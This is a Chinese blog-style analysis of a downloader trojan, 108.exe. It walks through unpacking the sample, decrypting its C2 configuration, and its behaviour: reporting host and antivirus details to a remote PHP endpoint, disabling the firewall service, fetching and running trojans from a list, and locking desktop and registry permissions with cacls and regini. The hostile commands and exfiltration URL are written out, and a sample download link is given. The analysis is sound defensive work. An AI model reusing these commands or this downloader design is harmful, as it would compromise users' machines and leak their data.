108.exe下载器分析报告
P.S.这块刚刚才入门,比较粗糙,请多多指教。
更新样本下载链接: http://download.csdn.net/detail/magictong/3898092
基本信息
文件名:108.exe
MD5:d7d7b22d096fc1568d5781e2df614734
属性:16372字节,无签名
调试运行环境:XPSP3
调试工具:OD IDA WinHexPEID
总结
样本是一个下载器,主要做两件事情,其一是破坏用户的一些环境,但是并没有去干掉杀软,从木马下载列表中下载木马运行;其二是搜集客户端的一些敏感信息进行上报(注:总结是分析完之后的概括)。
第一步,查壳
上PEID v0.95(官网)。
显示Nothing found[Overlay] *,Overlay的意思是有附加信息。但是看那个EP Setion的段名是nsp1,这么怪异,而且只有两个段,还有一个段是nsp0,用了下PEID的深扫,显示有壳的可能性很大。其实看这个段名基本可以猜到是有壳的。
但是如果不知道壳的名字,手脱也很麻烦,只好下了一个PEID的全插件版,这下出来了,显示信息NsPack 1.4 -> Liuxingping [Overlay] *,NsPack1.4的壳,神马玩意,先用PEID的通用脱壳试了下(警告:通用脱壳是需要运行起来的,并不是静态脱壳,谨慎使用),没搞定。到网上查了下这个NsPack 1.4壳,手脱不是很麻烦,开始吧!
第二步:脱壳
上OD。
首先用OD把这个exe文件打开,直接就来到了:
这个地方需要注意的是,可能是加壳后段没有对齐的缘故,如果鼠标上下滚动,OD里面的汇编指令会乱掉。但是入口地址是没错了0040A2B4(对比PEID显示的OEP信息)。
按照网上的脱壳教程:
1、按两次F7(单步),走到指令CALL0040A2BB(上图),貌似是调用一个函数(
流程猜测:看这个CALL的地址,实际就是这条CALL指令的下一条指令的地址,而它的下一条指令是POP EBP,什么意思?CALL指令会把下一条指令地址0040A2BB压入堆栈,然后执行POPEBP,堆栈上的0040A2BB被移除,同时给EBP 赋值为 0040A2BB)。
2、注意现在ESP的值是0012FFA0,对这个值下一个硬件访问断点(通过命令Hr 0012FFA0)。
3、现在来到了此处,走到了POPFD指令,嗯,可以和最开始的PUSHFD指令相呼应了,也许马上就水落石出了,注意到下一条的JMP 0040347F,这是一个E9长跳转,单步过去。
4、现在是到这里了,这个地方应该就是真正的OEP入口。
看着怪怪的,用OD分析一下代码,如下图,就很清晰了,简单看下MOV EAX, DWORD PTR FS:[0], ESP附近的几句代码应该就是安装异常处理链(对应到VC中是_try_catch)。
5、dump文件,使用OD的插件OllyDump即可,注意选取OEP为0000347F。脱壳之后我给这个新PE起名为UnPack_108.exe,这个PE可能比较简单,不需要再额外重建输入表和清除自校验,但是原来的程序是有附加数据的(Overlay),需要把这块数据用16进制编辑工具附加到脱壳之后的PE文件UnPack_108.exe的尾部,然后就可以使用了。过程有点麻烦,而且很有需要修复导入表,如果修复不成功是没法运行起来的。其实也可以不用dump文件而直接继续调试。只是每次都要手脱一下,可惜OD没有那种通过宏来保存操作的功能,否则可以把手脱的过程录制成宏。看看效果吧,o(∩_∩)o ,居然是VC6写的。
第三步:样本分析
先在虚拟机里面运行一下,会发现样本会启动一个和自己同名的进程(就是自己),会在C盘下创建一个名字叫winup的文件夹,不能向桌面拷贝文件,这是一些看得到的特征。
现在可以在上面的OD里面继续分析,或者重新用OD直接分析UnPack_108.exe这个文件,可以查看一下参考字符串,有如下一些(列举了一部分):
进程名:
360tray.exe
360sd.exe
Ravmond.exe
Avp.exe
Ekrn.exe
Kissvc.exe
Avguard.exe
Vptray.exe
Mpmon.exe
Mcshield.exe
……还有很多,我想你们懂的。
URL:
www.hao333.com/1.7
www.ho333.com/1
注册表:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace[8]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace[8]"
API:
WinExec (启动进程?)
InternetReadFile (下载?)
…… (还有很多)
其它信息:
C:\regset.ini
C:\winup\kb3716%d.exe
mutex_cpa_.la (注:这是一个mutex的名字么?)
mutex_cj1_.la
c:\baidu.dat
net stop sharedaccess (注:停掉共享服务?)
收获不少吧。我们还是一步步的跟踪下这个样本到底干了些啥吧。
好,现在开始!
1、用IDA可以简单看一下脱壳之后的程序,入口是winmain,当然程序的起始并不是winmain函数的第一句代码,前面还有很多初始化操作,我们可以看到,最开始是安装了一个系统SEH(结构化异常处理)结构(关于SHE和_try_catch的原理几个小时都讲不完,但是看到访问FS:[0]不出意外肯定是增长结构化异常处理链,VC编译器都会在初始化程序里面插入一段保护),前面可以迅速单步过掉,都是msvcrt里面的初始化代码。当走到GetStartupInfoA的时候要注意,马上就要进入WinMain函数了。
2、WinMain里面极其简单,调用几个无关紧要的API之后,最后调了函数TarpException(我给它起的名字,里面仅仅是触发了一个异常(故意触发,向29C地址写入6),然后流程就全部转到异常处理函数了),异常处理函数的地址是00403610,触发异常前先给00403610用BP命令下断(BP 00403610)。
3、下面遇到一点小波折,在那个msvcrt的异常处理函数里面转了半天才进入真正的模块“异常处理函数”(
这个地方应该有更简洁的方法,从_try_catch的内部实现来讲,它实际是对SHE异常链结构体进行了扩展,每个用_try_catch包起来的地方的异常处理函数都是msvcrt里面的_excpt_handler3,然后它通过插入一些特殊的数据,使得_excpt_handler3能够找到真正处理异常的客户代码,当然中间还有处理堆栈展开之类的操作,这个看来值得研究一下)。(后记:很囧的是,我后来发现直接alt+F9就回到客户代码,竟然忘记了o()︿))o )
4、真正干活的地方开始了(BP 004020D8,前面的那些做法,无非就是病毒作者让代码段看起来极其的小,可能是免杀吧)。
1) 获得google.txt文件
读取了自身文件最后的500个字节数据(附加的那段数据),把这段数据与0x35异或,我们也可以如法炮制,把这段数据直接从文件里面拷贝出来用winhex异或之后发现获得了这样一段数据:
$#ID=108$ID$COT=http://web.9981ly.com:882/admin/count.php$COT$TXT=http://web.9981ly.com:6668/Down/google.txt$TXT$
这段字符串猜测是获取文件http://web.9981ly.com:6668/Down/google.txt,但是可能是因为这个样本太老了,这个文件已经无法下载了(
但是我们可以猜测里面应该是其他木马或者病毒的地址之类)。
这个地方如果解密失败(通过判断前两个字节是不是0x2423),会弹出一个MessageBox,提示Error, Haven’t Write Code,如果你脱壳的时候没有加上这段附加数据,就会提示这个错误。解密成功的话会解析出URL(相当纠结):http://web.9981ly.com:6668/Down/google.txt并在后面拼出来一批css文件的URL:
http://web.9981ly.com:6668/Win7/s/mp/g.css
http://web.9981ly.com:6668/Win7/s/mp/h.css
http://web.9981ly.com:6668/down/ext/GetPcInfo.exe
把PHP脚本的URL也取出来了,如下:
http://web.9981ly.com:882/admin/count.php
http://web.9981ly.com:882/admin/getipaddr.php
同时最后这段硬编码拼出来下面一个文件的URL地址(可惜也不能下载了):
http://web.9981ly.com:6668/down/baidu.txt
2) 流程继续往下走时,会判断命令行,如果没有命令行,则调用系统的WinExec函数,启动一个带命令行的自身(这就是为什么开头的表现会有两个进程的缘故),然后第一个进程就退出了。
3) 我们现在用带命令行的方式再次调试该样本。很恶心的是,它的命令行是sj.c这样一个字符串,但是这个地方代码里面是找是否有a.exe,很奇怪,这里没弄明白。我先直接修改EAX的值,让样本走另一条流程。
4) 调用下载函数下载 http://web.9981ly.com:882/admin/getipaddr.php,可惜已经无法下载到了。
5) 创建一个名为mutex_cpa_.la的Mutex,用途:进程互斥,如果该mutex已经创建,则直接退出,看来它只想运行一个带命令行的程序。
6) 创建下载器木马注册表项,居然还有版本号的,如果第一运行会写下面这个注册表位置的版本号为1.0。[HKEY_LOCAL_MACHINE\SOFTWARE\CPACO] "ListVer"="1.0"
7) [BP 00402949] 创建名为mutex_cj2.la的mutex,如果已经存在这个mutex,程序就直接退出了。通过WinExec调用net stopsharedaccess关闭连接共享和防火墙服务。
8)删除文件c:\Program Files\nowlist.dat,然后下载http://web.9981ly.com:6668/Down/google.txt到文件c:\ProgramFiles\nowlist.dat。可惜无法看到这个文件里面的内容了。因为下载不到该文件,会影响执行流程,我们可以创建这样的一个文件,引导程序继续执行。读取文件nowlist.dat,判断文件头是不是“嘿嘿,这是标头哦”,如果是则读取文件中记录的木马的URL地址进行下载并运行。
9) [bp 0040238B],如果木马已经在系统跑过一次了,下次运行的时候,流程会有一些变化,准确的说,木马还进行了流程优化……6)里面讲到木马会写版本号,如果没有这个注册表键值,表示是第一次运行,木马还会做更多的事情。
下面是没有写注册表版本号的流程,从上面的6) 之后有些变化。
10) 首先进行的事情可以理解为收集信息并进行收据上报(
病毒木马也有数据上报的……它们上报来干嘛?你可以想象),上报的URL是(我的虚拟机的调试结果,里面的id是硬编码信息,pc是硬盘和IP信息,PcType是表示是家用计算机还是网吧计算机,AvName表示杀软进程信息):http://web.9981ly.com:882/admin/count.php?id=108&isInst=1&lockcode=-4452&pc=00000000000000000001/000C29CD5297&PcType=HomePc&AvName=OtherOrNone&ProCount=22,收集的信息有如下一些:
a、获取网卡信息,系统信息,依次访问设备 \\.\PhysicalDrive0 \\.\PhysicalDrive01 \\.\PhysicalDrive2 \\.\PhysicalDrive3,获取硬盘信息(VMwareVirtual IDE Hard Drive)。
b、枚举用户进程,判断是否有下列杀软或者安全软件进程名(硬编码):"360tray.exe" "360sd.exe" "Ravmond.exe""avp.exe" "ekrn.exe" "kissvc.exe" "kvsrvxp.exe""avguard.exe" "MPMon.exe" "Mcshield.exe" "VPTray.exe""ashWebSv.exe",如果没有则标记为OtherOrNone(它这里仅仅是上报用户的杀软使用情况,并没有去干掉杀软,与之前的想法有点出入)。
c、枚举用户进程,判断是否有下列进程名(硬编码):clsmn.exe Barclient.exe scon.exe pubwenclien.exe BarClientView.exemzdclient.exe EWay.exe NxpAuxSvc.exe,如果有则标记为WangbaPc,否则标记为HomePc(Wangba,Home这是拼音和英文的完美结合么)。
11) 信息搜集完了,下面又该干活了。同样也是创建了一个名为mutex_cj1.la的mutex用于判断是否已经有同样程序在运行了。
a、在c盘下创建c:\winup文件夹;
b、运行“net stop sharedaccess”关闭连接共享和防火墙服务;
c、从http://web.9981ly.com:6668/down/baidu.txt下载木马list文件并保存为c:\baidu.dat,从c:\baidu.dat中读取木马链接,依次下载木马(下载到c:\winup文件夹下,但是因为下载链都失效了,因此实际下载不到木马)并运行木马,每次间隔1秒钟。全部搞完之后有个30秒的停顿(这是想休息一下?)。
d、创建管道和cmd进程,创建管道的目的是接管cmd进程的输入和输出。然后执行了两条命令(cacls命令用来显示或者修改文件的访问控制表ACL),执行这两条命令之后你会发现你无法向桌面拷贝文件了,因为只有读权限了(
可以用命令cacls "c:\Documents and Settings\Administrator\桌面" /g everyone:f来恢复):
cacls"%userprofile%\桌面" /g everyone:r
cacls "C:\Documentsand Settings\All Users\桌面" /g everyone:r
e、在C盘创建文件c:\regset.ini文件,然后写入如下的字符串:
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace[8]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace[8]"
然后在cmd下面执行命令 regini c:\regset.ini 命令(注:regini命令用来修改对注册表键值的访问权限),执行结束后删除c:\regset.ini文件。执行这个命令后,用户对上述两个字符串键值就只有只读权限了。
f、然后是跟8) 相同的操作,下载木马运行,具体可以看8)。最后的一个Sleep长达15分钟。
g、然后程序在注册表:
[HKEY_LOCAL_MACHINE\SOFTWARE\CPACO]
"ListVer"="1.0"
写版本信息,退出程序。
[*over]